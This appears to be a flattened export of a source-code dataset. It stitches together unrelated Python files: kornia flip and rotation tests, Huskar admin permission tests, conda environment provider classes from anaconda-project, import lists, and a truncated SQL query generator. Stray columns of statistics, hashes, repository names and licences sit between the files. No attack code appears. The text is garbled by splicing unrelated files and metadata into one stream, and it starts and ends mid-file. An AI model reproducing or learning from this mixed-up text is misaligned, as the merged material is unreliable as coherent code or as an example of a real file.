        input = utils.tensor_to_gradcheck_var(input)  # to var
        assert gradcheck(kornia.Vflip(), (input, ), raise_exception=True)
class TestHflip:
    """Tests for kornia.Hflip (horizontal flip)."""

    def test_smoke(self, device, dtype):
        # Renamed from `smoke_test`: pytest only collects methods named
        # `test_*`, so under the old name this check never ran.
        f = kornia.Hflip()
        expected_repr = "Hflip()"  # avoid shadowing builtin `repr`
        assert str(f) == expected_repr

    def test_hflip(self, device, dtype):
        """Flipping a 3x3 image mirrors each row left-to-right."""
        f = kornia.Hflip()
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        expected = torch.tensor([[0., 0., 0.], [0., 0., 0.], [1., 1., 0.]], device=device, dtype=dtype)  # 3 x 3
        assert (f(input) == expected).all()

    def test_batch_hflip(self, device, dtype):
        """The flip applies independently to each image of a batch."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        f = kornia.Hflip()
        expected = torch.tensor([[[0., 0., 0.], [0., 0., 0.], [1., 1., 0.]]], device=device, dtype=dtype)  # 1 x 3 x 3
        expected = expected.repeat(2, 1, 1)  # 2 x 3 x 3
        assert (f(input) == expected).all()

    @pytest.mark.skip(reason="turn off all jit for a while")
    def test_jit(self, device, dtype):
        """JIT-traced hflip matches the eager result."""
        @torch.jit.script
        def op_script(data: torch.Tensor) -> torch.Tensor:
            return kornia.hflip(data)
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        # Build jit trace
        op_trace = torch.jit.trace(op_script, (input, ))
        # Create new inputs
        input = torch.tensor([[0., 0., 0.], [5., 5., 0.], [0., 0., 0.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        expected = torch.tensor([[[0., 0., 0.], [0., 5., 5.], [0., 0., 0.]]], device=device, dtype=dtype)  # 1 x 3 x 3
        expected = expected.repeat(2, 1, 1)
        actual = op_trace(input)
        assert_allclose(actual, expected)

    def test_gradcheck(self, device, dtype):
        """hflip is differentiable with respect to its input."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        input = utils.tensor_to_gradcheck_var(input)  # to var
        assert gradcheck(kornia.Hflip(), (input, ), raise_exception=True)
class TestRot180:
    """Tests for kornia.Rot180 (180-degree rotation)."""

    def test_smoke(self, device, dtype):
        # Renamed from `smoke_test`: pytest only collects methods named
        # `test_*`, so under the old name this check never ran.
        f = kornia.Rot180()
        expected_repr = "Rot180()"  # avoid shadowing builtin `repr`
        assert str(f) == expected_repr

    def test_rot180(self, device, dtype):
        """Rotating a 3x3 image by 180 degrees reverses rows and columns."""
        f = kornia.Rot180()
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        expected = torch.tensor([[1., 1., 0.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype)  # 3 x 3
        assert (f(input) == expected).all()

    def test_batch_rot180(self, device, dtype):
        """The rotation applies independently to each image of a batch."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        f = kornia.Rot180()
        expected = torch.tensor([[1., 1., 0.], [0., 0., 0.], [0., 0., 0.]], device=device, dtype=dtype)  # 3 x 3
        expected = expected.repeat(2, 1, 1)  # 2 x 3 x 3
        assert (f(input) == expected).all()

    @pytest.mark.skip(reason="turn off all jit for a while")
    def test_jit(self, device, dtype):
        """JIT-traced rot180 matches the eager result."""
        @torch.jit.script
        def op_script(data: torch.Tensor) -> torch.Tensor:
            return kornia.rot180(data)
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        # Build jit trace
        op_trace = torch.jit.trace(op_script, (input, ))
        # Create new inputs
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [5., 5., 0.]], device=device, dtype=dtype)  # 3 x 3
        input = input.repeat(2, 1, 1)  # 2 x 3 x 3
        expected = torch.tensor([[[0., 5., 5.], [0., 0., 0.], [0., 0., 0.]]], device=device, dtype=dtype)  # 1 x 3 x 3
        expected = expected.repeat(2, 1, 1)
        actual = op_trace(input)
        assert_allclose(actual, expected)

    def test_gradcheck(self, device, dtype):
        """rot180 is differentiable with respect to its input."""
        input = torch.tensor([[0., 0., 0.], [0., 0., 0.], [0., 1., 1.]], device=device, dtype=dtype)  # 3 x 3
        input = utils.tensor_to_gradcheck_var(input)  # to var
        assert gradcheck(kornia.Rot180(), (input, ), raise_exception=True)
| 32.2
| 118
| 0.535404
| 972
| 6,440
| 3.5
| 0.065844
| 0.079365
| 0.09612
| 0.09759
| 0.911229
| 0.894768
| 0.847443
| 0.847443
| 0.815109
| 0.814521
| 0
| 0.075652
| 0.267236
| 6,440
| 199
| 119
| 32.361809
| 0.645264
| 0.058851
| 0
| 0.703704
| 0
| 0
| 0.017617
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 1
| 0.166667
| false
| 0
| 0.055556
| 0.027778
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71e888f2cd298b6eaf301925888333178efad0e0
| 3,121
|
py
|
Python
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 59
|
2019-10-31T10:50:10.000Z
|
2021-11-26T04:32:25.000Z
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 5
|
2019-10-31T10:37:30.000Z
|
2020-03-02T06:45:46.000Z
|
tests/test_api/test_huskar_admin.py
|
mowangdk/huskar
|
7692fbc5672a5ae6e2a33616c493466a7137f8cd
|
[
"MIT"
] | 9
|
2019-10-31T10:35:00.000Z
|
2019-12-01T14:13:58.000Z
|
from __future__ import absolute_import
from huskar_api.models.auth import User
from ..utils import assert_response_ok
def test_add_huskar_admin(client, db, last_audit_log, admin_token, test_user):
    """Granting huskar admin sets the flag and records an audit log entry."""
    response = client.post(
        '/api/auth/huskar',
        data={'username': test_user.username},
        headers={'Authorization': admin_token})
    assert response.status_code == 201
    assert response.json['status'] == 'SUCCESS'

    is_admin = db.query(User.huskar_admin).filter_by(
        username=test_user.username).scalar()
    assert is_admin == 1

    log = last_audit_log()
    assert log.action_name == 'GRANT_HUSKAR_ADMIN'
    assert log.action_json['username'] == test_user.username
def test_add_huskar_admin_twice(
        client, db, last_audit_log, admin_token, test_user):
    """Re-granting to an existing admin succeeds without an audit log."""
    test_user.grant_admin()
    response = client.post(
        '/api/auth/huskar',
        data={'username': test_user.username},
        headers={'Authorization': admin_token})
    assert_response_ok(response)
    assert last_audit_log() is None
def test_add_huskar_admin_not_found(
        client, db, faker, last_audit_log, admin_token):
    """Granting to an unknown username returns 404 and logs nothing."""
    username = faker.uuid4()
    response = client.post(
        '/api/auth/huskar',
        data={'username': username},
        headers={'Authorization': admin_token})
    assert response.status_code == 404
    assert response.json['status'] == 'NotFound'
    assert response.json['message'] == 'user "%s" is not found' % username
    assert last_audit_log() is None
def test_add_huskar_admin_without_authority(
        client, last_audit_log, test_token, test_user):
    """A non-admin token may not grant huskar admin."""
    response = client.post(
        '/api/auth/huskar',
        data={'username': test_user.username},
        headers={'Authorization': test_token})
    assert response.status_code == 400
    assert response.json['status'] == 'NoAuthError'
    assert last_audit_log() is None
def test_delete_huskar_admin(
        client, db, last_audit_log, admin_token, test_user):
    """Dismissing an admin clears the flag and records an audit log entry."""
    test_user.grant_admin()
    response = client.delete(
        '/api/auth/huskar/%s' % test_user.username,
        headers={'Authorization': admin_token})
    assert_response_ok(response)

    is_admin = db.query(User.huskar_admin).filter_by(
        username=test_user.username).scalar()
    assert is_admin == 0

    log = last_audit_log()
    assert log.action_name == 'DISMISS_HUSKAR_ADMIN'
    assert log.action_json['username'] == test_user.username
def test_delete_huskar_admin_himself(
        client, db, last_audit_log, admin_user, admin_token):
    """An admin may not dismiss their own admin role."""
    response = client.delete(
        '/api/auth/huskar/%s' % admin_user.username,
        headers={'Authorization': admin_token})
    assert response.status_code == 403
    assert response.json['status'] == 'Forbidden'

    is_admin = db.query(User.huskar_admin).filter_by(
        username=admin_user.username).scalar()
    assert is_admin == 1
    assert last_audit_log() is None
def test_delete_huskar_admin_without_authority(
        client, last_audit_log, test_token, test_user, admin_user):
    """A non-admin token may not dismiss an admin."""
    response = client.delete(
        '/api/auth/huskar/%s' % admin_user.username,
        headers={'Authorization': test_token})
    assert response.status_code == 400
    assert response.json['status'] == 'NoAuthError'
    assert last_audit_log() is None
| 38.530864
| 78
| 0.685037
| 418
| 3,121
| 4.803828
| 0.150718
| 0.079681
| 0.083665
| 0.083665
| 0.835159
| 0.803785
| 0.791335
| 0.781375
| 0.763446
| 0.714143
| 0
| 0.007552
| 0.193848
| 3,121
| 80
| 79
| 39.0125
| 0.790541
| 0
| 0
| 0.539683
| 0
| 0
| 0.129125
| 0
| 0
| 0
| 0
| 0
| 0.412698
| 1
| 0.111111
| false
| 0
| 0.047619
| 0
| 0.15873
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71f9920e5b2b898211cde1ffa1f9634ead9a15fd
| 260
|
py
|
Python
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 102
|
2021-10-20T09:06:39.000Z
|
2022-03-28T13:35:11.000Z
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 98
|
2021-10-19T16:13:27.000Z
|
2022-03-27T13:27:49.000Z
|
entity/cards/LETL_015H/__init__.py
|
x014/lushi_script
|
edab2b88e3f0de8139de2541ab2daa331f777c0e
|
[
"MIT"
] | 55
|
2021-10-19T03:56:50.000Z
|
2022-03-25T08:25:26.000Z
|
# -*- coding: utf-8 -*-
import entity.cards.LETL_015H.LETL_262
import entity.cards.LETL_015H.LETL_263
import entity.cards.LETL_015H.LETL_015P9
import entity.cards.LETL_015H.LETL_265
import entity.cards.LETL_015H.LETL_266
import entity.cards.LETL_015H.LETL_267
| 32.5
| 40
| 0.830769
| 45
| 260
| 4.533333
| 0.311111
| 0.352941
| 0.5
| 0.617647
| 0.852941
| 0.852941
| 0
| 0
| 0
| 0
| 0
| 0.156379
| 0.065385
| 260
| 7
| 41
| 37.142857
| 0.683128
| 0.080769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
9c0b519220a3fc4a233126ea46add87f819c61b3
| 19,314
|
py
|
Python
|
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
anaconda_project/requirements_registry/providers/conda_env.py
|
vertingo/Anaconda_Videos_Tutos
|
f30f2a0549a7b81c17f4d5d249edc59eb3c05458
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2016, Anaconda, Inc. All rights reserved.
#
# Licensed under the terms of the BSD 3-Clause License.
# The full license is in the file LICENSE.txt, distributed with this software.
# -----------------------------------------------------------------------------
"""Conda environment providers."""
from __future__ import absolute_import, print_function
import os
import shutil
from anaconda_project.internal import conda_api
from anaconda_project.internal.simple_status import SimpleStatus
from anaconda_project.conda_manager import new_conda_manager, CondaManagerError
from anaconda_project.requirements_registry.provider import EnvVarProvider
from anaconda_project.provide import PROVIDE_MODE_CHECK
def _remove_env_path(env_path):
    """Also used by project_ops.py to delete environment files.

    Returns a SimpleStatus: success=True when the directory was removed or
    did not exist, success=False when rmtree raised.
    """
    # Guard clause: nothing on disk means nothing to do.
    if not os.path.exists(env_path):
        return SimpleStatus(success=True,
                            description=("Nothing to clean up for environment '%s'." % os.path.basename(env_path)))
    try:
        shutil.rmtree(env_path)
    except Exception as e:
        problem = "Failed to remove environment files in {}: {}.".format(env_path, str(e))
        return SimpleStatus(success=False, description=problem)
    return SimpleStatus(success=True, description=("Deleted environment files in %s." % env_path))
class CondaEnvProvider(EnvVarProvider):
    """Provides a Conda environment.

    Extends EnvVarProvider: the requirement's env var tracks the conda
    prefix path, and provide() creates/updates the environment via a
    CondaManager, then puts the prefix on PATH.
    """

    def __init__(self):
        """Override to create our CondaManager."""
        super(CondaEnvProvider, self).__init__()

    def missing_env_vars_to_configure(self, requirement, environ, local_state_file):
        """Override superclass to not require ourselves."""
        return ()

    def missing_env_vars_to_provide(self, requirement, environ, local_state_file):
        """Override superclass to not require ourselves."""
        return self.missing_env_vars_to_configure(requirement, environ, local_state_file)

    def read_config(self, requirement, environ, local_state_file, default_env_spec_name, overrides):
        """Override superclass to add a choice to create a project-scoped environment.

        Returns a config dict that always contains 'source' and 'env_name';
        'value' (the env prefix path) is filled in whenever it can be derived.
        """
        assert 'PROJECT_DIR' in environ
        project_dir = environ['PROJECT_DIR']
        if overrides.env_spec_name is not None:
            # short-circuit this whole party
            env = requirement.env_specs.get(overrides.env_spec_name)
            # future: it should be possible to override the env spec without using the
            # default-created project-scoped env.
            config = dict(source='project', env_name=overrides.env_spec_name, value=env.path(project_dir))
            return config
        config = super(CondaEnvProvider, self).read_config(requirement, environ, local_state_file,
                                                           default_env_spec_name, overrides)
        assert 'source' in config
        # we don't support a default here because it would
        # need a hardcoded path which the anaconda-project.yml author
        # would have no way of providing. Fortunately there's
        # no syntax in anaconda-project.yml that should result in setting
        # a default.
        assert config['source'] != 'default'
        if config['source'] == 'unset':
            # if nothing is selected, default to project mode
            # because we don't have a radio button in the UI for
            # "do nothing" right now.
            config['source'] = 'project'
        # if we're supposed to inherit the environment, we don't want to look at
        # anything else. This should always get rid of 'environ' source.
        if local_state_file.get_value('inherit_environment', default=False) and overrides.inherited_env is not None:
            config['source'] = 'inherited'
            config['value'] = overrides.inherited_env
        # convert 'environ' to 'project' when needed... this would
        # happen if you keep the default 'project' choice, so
        # there's nothing in anaconda-project-local.yml
        if config['source'] == 'environ':
            environ_value = config['value']
            project_dir = environ['PROJECT_DIR']
            environ_value_is_project_specific = False
            for env in requirement.env_specs.values():
                if env.path(project_dir) == environ_value:
                    environ_value_is_project_specific = True
            assert environ_value_is_project_specific
            config['source'] = 'project'
        # we should have changed 'environ' to the specific source; since for conda envs
        # we ignore the initial environ value, we always have to track our value in
        assert config['source'] != 'environ'
        # be sure we don't get confused by alternate ways to spell the path
        if 'value' in config:
            config['value'] = os.path.normpath(config['value'])
        config['env_name'] = default_env_spec_name
        if 'value' in config:
            # when the stored path matches a known env spec, use that spec's name
            for env in requirement.env_specs.values():
                if config['value'] == env.path(project_dir):
                    config['env_name'] = env.name
                    if config['source'] == 'variables':
                        config['source'] = 'project'
        elif config['source'] == 'project':
            env = requirement.env_specs.get(config['env_name'])
            config['value'] = env.path(project_dir)
        assert 'env_name' in config
        # print("read_config " + repr(config))
        return config

    def set_config_values_as_strings(self, requirement, environ, local_state_file, default_env_spec_name, overrides,
                                     values):
        """Override superclass to support 'project' source option."""
        super(CondaEnvProvider, self).set_config_values_as_strings(requirement, environ, local_state_file,
                                                                   default_env_spec_name, overrides, values)
        # We have to clear out the user override or it will
        # never stop overriding the user's new choice, if they
        # have changed to another env.
        overrides.env_spec_name = None
        if 'source' in values:
            if values['source'] == 'inherited':
                local_state_file.set_value('inherit_environment', True)
                # the superclass should have unset this so we inherit instead of using it
                assert local_state_file.get_value(['variables', requirement.env_var]) is None
            else:
                # don't write this out if it wasn't in there anyway
                if local_state_file.get_value('inherit_environment') is not None:
                    local_state_file.set_value('inherit_environment', False)
                if values['source'] == 'project':
                    project_dir = environ['PROJECT_DIR']
                    name = values['env_name']
                    for env in requirement.env_specs.values():
                        if env.name == name:
                            prefix = env.path(project_dir)
                            local_state_file.set_value(['variables', requirement.env_var], prefix)

    def provide(self, requirement, context):
        """Override superclass to create or update our environment."""
        assert 'PATH' in context.environ
        conda = new_conda_manager(context.frontend)
        # set from the inherited value if necessary
        if context.status.analysis.config['source'] == 'inherited':
            context.environ[requirement.env_var] = context.status.analysis.config['value']
        # set the env var (but not PATH, etc. to fully activate, that's done below)
        super_result = super(CondaEnvProvider, self).provide(requirement, context)
        project_dir = context.environ['PROJECT_DIR']
        env_name = context.status.analysis.config.get('env_name', context.default_env_spec_name)
        env_spec = requirement.env_specs.get(env_name)
        if context.status.analysis.config['source'] == 'inherited':
            prefix = context.environ.get(requirement.env_var, None)
            inherited = True
        else:
            prefix = None
            inherited = False
        if prefix is None:
            # use the default environment
            prefix = env_spec.path(project_dir)
        assert prefix is not None
        # if the value has changed, choose the matching env spec
        # (something feels wrong here; should this be in read_config?
        # or not at all?)
        for env in requirement.env_specs.values():
            if env.path(project_dir) == prefix:
                env_spec = env
                break
        if context.mode != PROVIDE_MODE_CHECK:
            # we update the environment in both prod and dev mode
            # TODO if not creating a named env, we could use the
            # shared packages, but for now we leave it alone
            assert env_spec is not None
            try:
                # only create the env from scratch when it is not inherited
                conda.fix_environment_deviations(prefix, env_spec, create=(not inherited))
            except CondaManagerError as e:
                return super_result.copy_with_additions(errors=[str(e)])
        conda_api.environ_set_prefix(context.environ, prefix, varname=requirement.env_var)
        path = context.environ.get("PATH", "")
        context.environ["PATH"] = conda_api.set_conda_env_in_path(path, prefix)
        # Some stuff can only be done when a shell is launched:
        # - we can't set PS1 because it shouldn't be exported.
        # - we can't run conda activate scripts because they are sourced.
        # We can do these in the output of our activate command, but not here.
        return super_result

    def unprovide(self, requirement, environ, local_state_file, overrides, requirement_status=None):
        """Override superclass to delete project-scoped envs directory."""
        config = self.read_config(requirement,
                                  environ,
                                  local_state_file,
                                  # future: pass in this default_env_spec_name
                                  default_env_spec_name='default',
                                  overrides=overrides)
        env_path = config.get('value', None)
        assert env_path is not None
        project_dir = environ['PROJECT_DIR']
        # never delete an environment that lives outside the project directory
        if not env_path.startswith(project_dir):
            return SimpleStatus(success=True,
                                description=("Current environment is not in %s, no need to delete it." % project_dir))
        return _remove_env_path(env_path)
class CondaBootstrapEnvProvider(EnvVarProvider):
    """Provides a Conda environment.

    Variant of CondaEnvProvider pinned to the project's 'bootstrap-env':
    provide() always uses the envs/bootstrap-env prefix under the project
    directory and always creates the environment if missing.
    """

    def __init__(self):
        """Override to create our CondaManager."""
        super(CondaBootstrapEnvProvider, self).__init__()

    def missing_env_vars_to_configure(self, requirement, environ, local_state_file):
        """Override superclass to not require ourselves."""
        return ()

    def missing_env_vars_to_provide(self, requirement, environ, local_state_file):
        """Override superclass to not require ourselves."""
        return self.missing_env_vars_to_configure(requirement, environ, local_state_file)

    def read_config(self, requirement, environ, local_state_file, default_env_spec_name, overrides):
        """Override superclass to add a choice to create a project-scoped environment.

        Same flow as CondaEnvProvider.read_config but asserts the default
        env spec name is 'bootstrap-env'.
        """
        assert 'PROJECT_DIR' in environ
        project_dir = environ['PROJECT_DIR']
        if overrides.env_spec_name is not None:
            # short-circuit this whole party
            env = requirement.env_specs.get(overrides.env_spec_name)
            # future: it should be possible to override the env spec without using the
            # default-created project-scoped env.
            config = dict(source='project', env_name=overrides.env_spec_name, value=env.path(project_dir))
            return config
        config = super(CondaBootstrapEnvProvider, self).read_config(requirement, environ, local_state_file,
                                                                    default_env_spec_name, overrides)
        assert 'source' in config
        if config['source'] == 'unset':
            # if nothing is selected, default to project mode
            # because we don't have a radio button in the UI for
            # "do nothing" right now.
            config['source'] = 'project'
        # if we're supposed to inherit the environment, we don't want to look at
        # anything else. This should always get rid of 'environ' source.
        if local_state_file.get_value('inherit_environment', default=False) and overrides.inherited_env is not None:
            config['source'] = 'inherited'
            config['value'] = overrides.inherited_env
        # convert 'environ' to 'project' when needed... this would
        # happen if you keep the default 'project' choice, so
        # there's nothing in anaconda-project-local.yml
        if config['source'] == 'environ':
            environ_value = config['value']
            project_dir = environ['PROJECT_DIR']
            environ_value_is_project_specific = False
            for env in requirement.env_specs.values():
                if env.path(project_dir) == environ_value:
                    environ_value_is_project_specific = True
            assert environ_value_is_project_specific
            config['source'] = 'project'
        # we should have changed 'environ' to the specific source; since for conda envs
        # we ignore the initial environ value, we always have to track our value in
        assert config['source'] != 'environ'
        # be sure we don't get confused by alternate ways to spell the path
        if 'value' in config:
            config['value'] = os.path.normpath(config['value'])
        config['env_name'] = default_env_spec_name
        # this provider is only ever used for the bootstrap env spec
        assert config['env_name'] == 'bootstrap-env'
        if 'value' in config:
            # when the stored path matches a known env spec, use that spec's name
            for env in requirement.env_specs.values():
                if config['value'] == env.path(project_dir):
                    config['env_name'] = env.name
                    if config['source'] == 'variables':
                        config['source'] = 'project'
        elif config['source'] == 'project':
            env = requirement.env_specs.get(config['env_name'])
            config['value'] = env.path(project_dir)
        assert 'env_name' in config
        return config

    def set_config_values_as_strings(self, requirement, environ, local_state_file, default_env_spec_name, overrides,
                                     values):
        """Override superclass to support 'project' source option."""
        super(CondaBootstrapEnvProvider, self).set_config_values_as_strings(requirement, environ, local_state_file,
                                                                            default_env_spec_name, overrides, values)
        # We have to clear out the user override or it will
        # never stop overriding the user's new choice, if they
        # have changed to another env.
        overrides.env_spec_name = None
        if 'source' in values:
            if values['source'] == 'inherited':
                local_state_file.set_value('inherit_environment', True)
                # the superclass should have unset this so we inherit instead of using it
                assert local_state_file.get_value(['variables', requirement.env_var]) is None
            else:
                # don't write this out if it wasn't in there anyway
                if local_state_file.get_value('inherit_environment') is not None:
                    local_state_file.set_value('inherit_environment', False)
                if values['source'] == 'project':
                    project_dir = environ['PROJECT_DIR']
                    name = values['env_name']
                    for env in requirement.env_specs.values():
                        if env.name == name:
                            prefix = env.path(project_dir)
                            local_state_file.set_value(['variables', requirement.env_var], prefix)

    def provide(self, requirement, context):
        """Override superclass to create or update our environment."""
        assert 'PATH' in context.environ
        conda = new_conda_manager(context.frontend)
        # set from the inherited value if necessary
        if context.status.analysis.config['source'] == 'inherited':
            context.environ[requirement.env_var] = context.status.analysis.config['value']
        # set the env var (but not PATH, etc. to fully activate, that's done below)
        super_result = super(CondaBootstrapEnvProvider, self).provide(requirement, context)
        project_dir = context.environ['PROJECT_DIR']
        env_name = context.status.analysis.config.get('env_name', context.default_env_spec_name)
        env_spec = requirement.env_specs.get(env_name)
        # unlike CondaEnvProvider, the prefix is always the fixed bootstrap path
        prefix = os.path.join(project_dir, 'envs', 'bootstrap-env')
        # if the value has changed, choose the matching env spec
        # (something feels wrong here; should this be in read_config?
        # or not at all?)
        for env in requirement.env_specs.values():
            if env.path(project_dir) == prefix:
                env_spec = env
                break
        if context.mode != PROVIDE_MODE_CHECK:
            # we update the environment in both prod and dev mode
            # TODO if not creating a named env, we could use the
            # shared packages, but for now we leave it alone
            assert env_spec is not None
            try:
                conda.fix_environment_deviations(prefix, env_spec, create=True)
            except CondaManagerError as e:
                return super_result.copy_with_additions(errors=[str(e)])
        conda_api.environ_set_prefix(context.environ, prefix, varname=requirement.env_var)
        path = context.environ.get("PATH", "")
        context.environ["PATH"] = conda_api.set_conda_env_in_path(path, prefix)
        # Some stuff can only be done when a shell is launched:
        # - we can't set PS1 because it shouldn't be exported.
        # - we can't run conda activate scripts because they are sourced.
        # We can do these in the output of our activate command, but not here.
        return super_result

    def unprovide(self, requirement, environ, local_state_file, overrides, requirement_status=None):
        """Override superclass to delete project-scoped envs directory."""
        config = self.read_config(requirement,
                                  environ,
                                  local_state_file,
                                  # future: pass in this default_env_spec_name
                                  default_env_spec_name='bootstrap-env',
                                  overrides=overrides)
        env_path = config.get('value', None)
        assert env_path is not None
        project_dir = environ['PROJECT_DIR']
        # never delete an environment that lives outside the project directory
        if not env_path.startswith(project_dir):
            return SimpleStatus(success=True,
                                description=("Current environment is not in %s, no need to delete it." % project_dir))
        return _remove_env_path(env_path)
| 46.427885
| 118
| 0.621466
| 2,309
| 19,314
| 5.018623
| 0.124729
| 0.034518
| 0.036244
| 0.043493
| 0.865982
| 0.856748
| 0.856748
| 0.852951
| 0.852951
| 0.852951
| 0
| 0.000582
| 0.288444
| 19,314
| 415
| 119
| 46.539759
| 0.842611
| 0.257844
| 0
| 0.828326
| 0
| 0
| 0.085839
| 0
| 0
| 0
| 0
| 0.00241
| 0.090129
| 1
| 0.064378
| false
| 0
| 0.034335
| 0
| 0.188841
| 0.004292
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c3a5d6b0e883d69a8262494aae80fc29d783627
| 64
|
py
|
Python
|
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
pingo/test/level0/__init__.py
|
willingc/pingo
|
0890bf5ed763e9061320093fc3fb5f7543c5cc2c
|
[
"MIT"
] | null | null | null |
from cases import BoardBasics
from cases import BoardExceptions
| 21.333333
| 33
| 0.875
| 8
| 64
| 7
| 0.625
| 0.321429
| 0.535714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 64
| 2
| 34
| 32
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
9c7eab96454423ada5677490d4dfc632f2bf0a5c
| 12,457
|
py
|
Python
|
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | 1
|
2022-01-07T09:32:48.000Z
|
2022-01-07T09:32:48.000Z
|
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | null | null | null |
scripts/database/mapping_methods.py
|
patrickjchap/Static-Bug-Detectors-ASE-Artifact
|
9104a6c9d8105725d3f2351893ff3f4022b02faa
|
[
"BSD-3-Clause"
] | 1
|
2021-11-19T00:33:30.000Z
|
2021-11-19T00:33:30.000Z
|
'''
Contains functions for generating the different database queries for
each respective mapping method.
'''
def generate_code_diff_query(diff_table: str, tool_table: str) -> str:
    """Return SQL joining tool warnings to code-diff hunks.

    Matches rows on image_tag where the reported bug line range overlaps
    the patched line range (in either direction).
    """
    dt = f'`{diff_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {dt} INNER JOIN {tt} ON '
            f'{dt}.image_tag = {tt}.image_tag WHERE '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
            f'LOCATE({dt}.file,{tt}.file) != "" or '
            f'LOCATE({tt}.file,{dt}.file) != "" AND '
            f'((({tt}.bug_lower BETWEEN {dt}.patch_lower AND '
            f'{dt}.patch_upper) OR ({tt}.bug_upper BETWEEN '
            f'{dt}.patch_lower AND {dt}.patch_upper)) OR '
            f'(({dt}.patch_lower BETWEEN {tt}.bug_lower AND '
            f'{tt}.bug_upper) OR ({dt}.patch_lower BETWEEN '
            f'{tt}.bug_lower AND {tt}.bug_upper)));')
def generate_code_diff_query_infer(diff_table: str, tool_table: str) -> str:
    """Return SQL joining Infer warnings to code-diff hunks.

    Same overlap join as generate_code_diff_query, restricted to
    NULL_DEREFERENCE findings.
    """
    dt = f'`{diff_table}`'
    tt = f'`{tool_table}`'
    return (f'SELECT * FROM {dt} INNER JOIN {tt} ON '
            f'{dt}.image_tag = {tt}.image_tag WHERE '
            f'({tt}.version = "failed" OR {tt}.version = "b") AND '
